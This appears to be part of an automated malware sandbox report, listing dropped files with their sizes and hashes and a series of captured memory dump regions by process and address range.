C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ws0id0mh.yyn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hhbzrpcpecisisezrendew

Filesize
4KB

MD5
91227a2f05c7f74f6ebd1535a3f05b7b

SHA1
1ce317a272d67e3ac284948e49e6bc0acaee2e6d

SHA256
2967c8bcad47ab6cb88bf5b60a3a75b49f471a943d33c9b69aa7bfe1b763cfd2

SHA512
9ff9f6d2fb2880812fce42b91388e8b825483bb2df0976b9c630c397fed68f3625f4ba32d65933de0018b6e18554315152a1df00c98313d19612403076079a40

Download Submit
memory/1536-73-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1536-84-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-31-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-85-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-35-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-38-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-83-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-82-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-81-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-43-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-44-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-45-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-46-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-47-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-49-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-80-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-79-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-78-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-34-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-75-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1536-74-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1536-70-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2172-56-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2172-55-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2172-51-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2644-18-0x00007FFE85780000-0x00007FFE86241000-memory.dmp

Filesize
10.8MB

Download
memory/2644-8-0x000001F79CB50000-0x000001F79CB72000-memory.dmp

Filesize
136KB

Download
memory/2644-7-0x00007FFE85783000-0x00007FFE85785000-memory.dmp

Filesize
8KB

Download
memory/2644-19-0x00007FFE85780000-0x00007FFE86241000-memory.dmp

Filesize
10.8MB

Download
memory/2644-42-0x00007FFE85780000-0x00007FFE86241000-memory.dmp

Filesize
10.8MB

Download
memory/2868-52-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2868-58-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2868-53-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3888-57-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3888-50-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3888-54-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3904-29-0x0000015B20000000-0x0000015B202C0000-memory.dmp

Filesize
2.8MB

Download